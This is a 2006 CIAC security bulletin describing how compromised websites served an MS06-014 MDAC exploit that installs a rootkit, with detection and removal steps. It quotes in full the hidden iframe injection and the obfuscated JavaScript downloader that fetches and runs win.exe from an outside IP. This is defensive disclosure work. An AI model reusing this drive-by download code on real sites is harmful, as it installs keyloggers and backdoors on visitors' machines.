INFORMATION BULLETIN

Q-327: Exploits of MDAC (MS06-014) Vulnerability in the Wild

September 29, 2006 19:00 GMT


PROBLEM:	Numerous public websites have been compromised with a small <iframe> command that downloads an exploit for the MS06-014 vulnerability in the Microsoft Data Access Components (see CIAC Bulletin: Q-171: Vulnerability in the Microsoft Data Access Components (MDAC) Function). The exploit downloads and installs a rootkit.
PLATFORM:	Windows systems with MDAC 2.8 SP2 and earlier.
DAMAGE:	A remote intruder can gain user access to a system.
SOLUTION:	See CIAC Bulletin: Q-171: Vulnerability in the Microsoft Data Access Components (MDAC) Function, and apply the appropriate patches.

VULNERABILITY ASSESSMENT:	The risk is MEDIUM. Remote intruders can gain user access to a system.

LINKS:
CIAC BULLETIN:	http://www.ciac.org/ciac/bulletins/q-327.shtml
PATCHES:	http://www.ciac.org/ciac/bulletins/q-171.shtml http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
CVE:	CVE-2006-003

CIAC has information that an exploit for the Microsoft Data Access Components vulnerability (MS06-014) is in the wild.

Operation

The exploit is downloaded from public websites by unsuspecting visitors. The exploit starts with an iframe inserted at the very top of a public web page.

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" 
scrolling="no" name=counter></iframe>

The <iframe> tag creates a tiny, 1 by 1 pixel iframe and loads index.html into it. Index.html is a script that attempts to exploit the MDAC, to download and run the file win.exe. Note that this file may trigger antivirus scanners on most systems as a Trojan downloader.

<html>
<script>
<!--
function f(b, a, c) { return a + b + c; }
function g(b, a) { return a + b; }
var s = new Array
(
 "",
 "win.exe",
 "http://81.95.146.98/", "object",
 "classid",
 f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")), 
 g(f("ft.XMLH", "oso", "TTP"), "Micr"),
 f("E", "G", "T"),
 f(g(".Str", "odb"), "Ad", "eam"),
 f(g(".She", "ipt"), "WScr", "ll"),
 "PROCESS",
 "TMP",
 "/[^/]*$",
 "/",
 "\\"
);
a = document.createElement(s[3]);
a.setAttribute(s[4], s[5]);
with(a.CreateObject(s[6], s[0]))
{
 open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false);
 send();
 if(status < 400)
  with(a.CreateObject(s[8], s[0]))
  {
   Type = 1;
   Open();
   Write(responseBody);
   with(a.CreateObject(s[9], s[0]))
   {
    c = Environment(s[10])(s[11]) + s[14] + s[1];
    SaveToFile(c, 2);
    Exec(c);
   }
  }
}
location.replace(s[2]);
// -->
</script>
</html>

Note that most of the script is for obfuscation of the script’s function.

The file win.exe is downloaded into the temp directory and run. It then installs and runs the following rootkit files into the %windir%\system32 directory. Here %windir% is the current windows directory (\windows, \winnt, etc.).

qo.dll
qo.sys
yvbb01.dll
yvbb01.sys
yvbb02.sys

The rootkit hides these files, installs a keyboard sniffer to capture logins and opens a backdoor for intruder access to the system. The rootkit installs the following registry keys to install the rootkit as a service even in safe mode.

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\yvbb02.sys
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\yvbb02.sys
HKLM\SYSTEM\CurrentControlSet\Services\yvbb01
HKLM\SYSTEM\CurrentControlSet\Services\yvbb02

Detection

Detection of a compromised system can be done by detecting network connections to 81.95.146.98 and the download of index.html or win.exe. To detect a compromised system by examining the files, you must get around the file hiding. To see the hidden files, remote mount the file system and look for them in the %windir%\system32 directory. The file hiding does not work for remotely mounted file systems. Alternately, you can use the tool: flister available from,

http://invisiblethings.org/tools.html

Flister is a command line file lister that can see through the file hiding.

Removal

To remove the backdoor from a compromised system, you must first shut down the malicious services. The hidden services install themselves as “Miniport FT” and “Miniport FT32” but in most cases, they refused to stop when using the “net stop ” command in a command window. To kill the services, remotely mount the file system and delete the malicious files from the %windir%\system32 directory. Reboot the system and make sure the files have not returned.

Now you can see and remove the registry keys listed above and all their subkeys. Search for the file names in the registry. You will also find them in the LEGACY_filename service keys such as LEGACY_YVBB02. Delete any keys that contain them.

Note that these directions only remove the initial rootkit and not any other software installed by the intruder.

CIAC services are available to DOE, DOE Contractors, and the NIH. CIAC can be contacted at:

    Voice:          +1 925-422-8193 (7 x 24)
    FAX:            +1 925-423-8002
    STU-III:        +1 925-423-2604
    E-mail:          ciac@ciac.org
    World Wide Web:  http://www.ciac.org/
    Anonymous FTP:   ftp.ciac.org

This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes.

UCRL-MI-119788
[Privacy and Legal Notice]